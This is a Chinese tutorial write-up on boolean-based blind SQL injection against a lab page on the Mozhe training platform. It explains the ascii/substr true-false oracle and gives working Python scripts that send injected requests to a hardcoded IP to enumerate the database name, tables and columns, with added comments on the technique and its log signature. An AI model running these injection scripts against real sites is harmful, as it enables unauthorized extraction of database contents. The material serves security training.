SQL手工注入知识回顾(二)

还是墨者的平台,还是熟悉的平台,这次是布尔盲注,上一个实验,我们可以直接从页面返回信息中看到我们想要的数据。
下面分别是上次和这次的截图,可以看到我们已经无法将查询信息显示在页面上了


那要如何确定我们想知道的数据呢?这里可以用到布尔盲注:布尔盲注是通过判断页面返回true还是false来推断数据的。
id=1 and ascii(substr(database(),1,1))>33

substr(database(),1,1)这里是截取database()的返回值,从第1位开始,截取1位,然后判断这一位的ascii值。如果>33,即and后的判断为真,则页面会正常返回;如果这一位的ascii值小于等于33,则and前为真,后为假,页面不会正常返回。这里也可以用等于来进行判断,只不过等于的话只能一个个试,而大于小于的话可以用二分法来加速。
如果想确定数据库名,那么可以先用length(database())来确定数据库名的长度,然后再用ascii()来确定每一位的具体值,表名什么的原理也是一样的。
手工的话比较慢,用Python脚本快一些。
--------------------------------------------------------------------------------------------------------------------------
import requests
#获取数据库名
def database_len() -> int | None:
    """Return the length of the current database name via boolean-blind probing.

    Each iteration sends one GET whose ``id`` parameter carries
    ``and length(database())>i``; the marker ``'2018'`` in the response
    body is the true/false oracle (presumably a string the normal lab page
    always contains — confirm against the page).  The first ``i`` for which
    the marker disappears is the length, since ``length > i-1`` held on the
    previous iteration.  Returns None if the loop runs out (length >= 99).

    From a detection standpoint: every probe is a near-identical GET to the
    same path whose ``id`` value differs only in one integer and ends in
    the encoded comment ``%23`` — dozens of such requests in a row is the
    visible signature of this technique in an access log.
    """
    for i in range(1,100):
        url = "http://219.153.49.228:48414/new_list.php?id=1 and length(database())>{}".format(i)
        # '%23' is a URL-encoded '#', which comments out the rest of the query
        r = requests.get(url+'%23')
        if '2018' not in r.text:
            print('database_length:',i)
            return i
def database_name() -> None:
    """Recover the database name one character at a time and print it.

    Calls database_len() for the number of positions (if that returns
    None the ``+1`` below raises TypeError), then for each position ``j``
    tries every printable ASCII code 33..126 with
    ``ascii(substr(database(),j,1))=i`` until the oracle marker ``'2018'``
    appears.  That is up to 94 requests per character.  A position whose
    code falls outside 33..126 matches nothing and is silently skipped,
    leaving the printed name short with no error.
    """
    name = ''
    for j in range(1,database_len()+1):
        for i in range(33,127):
            url = "http://219.153.49.228:48414/new_list.php?id=1 and ascii(substr(database(),{},1))={}".format(j,i)
            r = requests.get(url+'%23')
            if '2018' in r.text:
                name = name+chr(i)
                break
    print('database_name:',name)
# Script entry point: the probe runs as soon as the module is executed.
database_name()

--------------------------------------------------------------------------------------------------------------------
import requests
# Database name read from stdin; it is interpolated between single quotes
# in the table_schema='...' predicate built by table_number() below.
DatabaseName=input('请输入数据库名:')
def table_number() -> None:
    """Count the tables of DatabaseName by probing information_schema.tables.

    For n = 1..99 it asks whether the table selected by
    ``limit limitnumber,1`` has a name of length > 0.  While the oracle
    marker ``'2018'`` is present another table exists and ``limitnumber``
    advances (it always equals ``n-1``).  On the first miss it prints
    ``n-1`` as the table count and stops.  Nothing is returned, the count
    is only printed; if all 99 probes succeed nothing is printed at all.
    """
    limitnumber=0
    for n in range(1,100):
        url = "http://219.153.49.228:48414/new_list.php?id=1 and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)>0".format(DatabaseName,limitnumber)
        r = requests.get(url+'%23')
        if '2018' in r.text:
            limitnumber=limitnumber+1
        else:
            print("数据库",DatabaseName,"中有",n-1,"个表")
            break
# Script entry point.
table_number()

---------------------------------------------------------------------------------------------------------------------
获取数据库表名
import requests
DatabaseName='stormgroup' # database name (recovered by the earlier script)
TableNumber=2 # number of tables (from table_number())
log_tablelen=[] # module-level list that stores each table name's length, one entry per table
def log_table_len(a: int) -> None:
    """Append one table-name length to the module-level ``log_tablelen`` list."""
    # ``global`` is not strictly needed for .append (it mutates rather than
    # rebinds), but it is kept as the author wrote it.
    global log_tablelen
    log_tablelen.append(a)
def table_len() -> None:
    """Find the name length of each of the TableNumber tables.

    For table ``i`` (selected with ``limit i-1,1``) it probes
    ``length(table_name)>j`` for j = 0..99; the first ``j`` where the
    oracle marker ``'2018'`` is absent is the length (``length > j-1``
    held just before).  Each length is printed and pushed onto
    ``log_tablelen`` in table order.  If a table never produces a miss
    nothing is appended for it, and table_name() will later hit an
    IndexError on ``log_tablelen[i-1]``.
    """
    for i in range(1,TableNumber+1):
        for j in range(0,100):
            url = "http://219.153.49.228:48414/new_list.php?id=1 and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)>{}".format(DatabaseName,i-1,j)
            r = requests.get(url+'%23')
            if '2018' not in r.text:
                print('第',i,'个表的长度为',j)
                log_table_len(j)
                break
def table_name() -> None:
    """Recover each table name character by character and print it.

    Relies on ``log_tablelen`` having been filled by table_len().  For
    table ``i`` and position ``j`` it tries ASCII codes 33..126 with
    ``ascii(substr((select table_name ... limit i-1,1),j,1))=k`` until the
    oracle marker ``'2018'`` appears.  A character outside that range is
    skipped without error, so a printed name may be shorter than the
    recorded length.
    """
    for i in range(1,TableNumber+1):
        tablename=''
        for j in range(1,log_tablelen[i-1]+1):
            for k in range(33,127):
                url = "http://219.153.49.228:48414/new_list.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1))={}".format(DatabaseName,i-1,j,k)
                r = requests.get(url+'%23')
                if '2018' in r.text:
                    tablename = tablename+chr(k)
                    break
        print('第',i,'个表的name为',tablename)
# Script entry: table_len() must run first because table_name() indexes
# the ``log_tablelen`` list it fills.
table_len()
table_name()

-------------------------------------------------------------------------------------------------------------
获取column名称
import requests
log_databasename='stormgroup'  # database name recovered earlier
log_tablenumber=2  # number of tables in that database
log_tablename=['member','notice']  # table names recovered by the previous script
log_columnnumber=[]  # per-table column counts, in table order; filled by column_number()
def log_column_number(a: int) -> None:
    """Append one table's column count to the module-level ``log_columnnumber`` list."""
    global log_columnnumber
    log_columnnumber.append(a)
def column_number() -> None:
    """Count the columns of every table listed in ``log_tablename``.

    For each table it probes information_schema.columns with
    ``limit limitnumber,1`` and asks whether that column's name has
    length > 0; while the oracle marker ``'2018'`` is present
    ``limitnumber`` advances (it always equals ``n-1``).  On the first
    miss the count ``n-1`` is printed and appended to ``log_columnnumber``.
    If all 99 probes for a table succeed nothing is recorded for it, which
    shifts the indices the later passes rely on.

    NOTE(review): this script uses port 44313 and a doubled slash in the
    path, unlike the earlier scripts (48414) — presumably a re-provisioned
    lab instance; left exactly as written.
    """
    DatabaseName=log_databasename
    for i in range(1,log_tablenumber+1):
        TableName=log_tablename[i-1]
        limitnumber=0
        for n in range(1,100):
            url = "http://219.153.49.228:44313//new_list.php?id=1 and (select length(column_name) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)>0".format(DatabaseName,TableName,limitnumber)
            r = requests.get(url+'%23')
            if '2018' in r.text:
                limitnumber=limitnumber+1
            else:
                print("表",TableName,"中有",n-1,"个列")
                log_column_number(n-1)
                break
def column_name_len() -> None:
    """Find the name length of every column of every table.

    Requires ``log_columnnumber`` to be filled by column_number().  For
    column ``j`` of a table (``limit j-1,1``) it probes
    ``length(column_name)>k`` for k = 0..99; the first miss of the oracle
    marker ``'2018'`` gives the length, which is printed and pushed onto
    ``log_columnlen`` via log_column_len() — a helper defined further down
    the module, which is fine because it exists by the time this function
    is called at the bottom of the script.  Lengths are appended in a
    single flat list across all tables, in table order.
    """
    DatabaseName=log_databasename
    for i in range(1,log_tablenumber+1):
        TableName=log_tablename[i-1]
        for j in range(1,log_columnnumber[i-1]+1):
            for k in range(0,100):
                url = "http://219.153.49.228:44313//new_list.php?id=1 and (select length(column_name) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)>{}".format(DatabaseName,TableName,j-1,k)
                r = requests.get(url+'%23')
                if '2018' not in r.text:
                    print(TableName,'的第',j,'个列为的长度为',k)
                    log_column_len(k)
                    break
log_columnlen=[]  # one length per column across all tables, flat, in table order; filled by column_name_len()
def log_column_len(a: int) -> None:
    """Append one column-name length to the module-level ``log_columnlen`` list."""
    global log_columnlen
    log_columnlen.append(a)
log_columnname=[]  # recovered column names, same flat order as log_columnlen; filled by column_name()
def log_column_name(a: str) -> None:
    """Append one recovered column name to the module-level ``log_columnname`` list."""
    global log_columnname
    log_columnname.append(a)
def column_name() -> None:
    """Recover every column name character by character.

    ``NO`` is a running index into the flat ``log_columnlen`` list, so
    the lengths recorded by column_name_len() are consumed in the same
    table-then-column order they were produced.  For each position ``k``
    the ASCII codes 33..126 are tried with
    ``ascii(substr((select column_name ... limit j-1,1),k,1))=l`` until
    the oracle marker ``'2018'`` appears.  Note that the print sits inside
    the per-character loop, so the partial name is printed once per
    recovered character; the last line printed for a column is the full
    name.  Each finished name is appended to ``log_columnname``.
    """
    NO=0
    DatabaseName=log_databasename
    for i in range(1,log_tablenumber+1):
        TableName=log_tablename[i-1]
        for j in range(1,log_columnnumber[i-1]+1):
            columnname=''
            for k in range(1,log_columnlen[NO]+1):
                for l in range(33,127):
                    url = "http://219.153.49.228:44313//new_list.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1))={}".format(DatabaseName,TableName,j-1,k,l)
                    r = requests.get(url+'%23')
                    if '2018' in r.text:
                        columnname = columnname+chr(l)
                        print(TableName,'的第',j,'个列的名称为',columnname)
                        break
            log_column_name(columnname)
            NO=NO+1
# Script entry: the three passes must run in this order, because each
# one fills the module-level list that the next one indexes.
column_number()
column_name_len()
column_name()


查询具体数据的代码我还没写,写完之后再贴上来
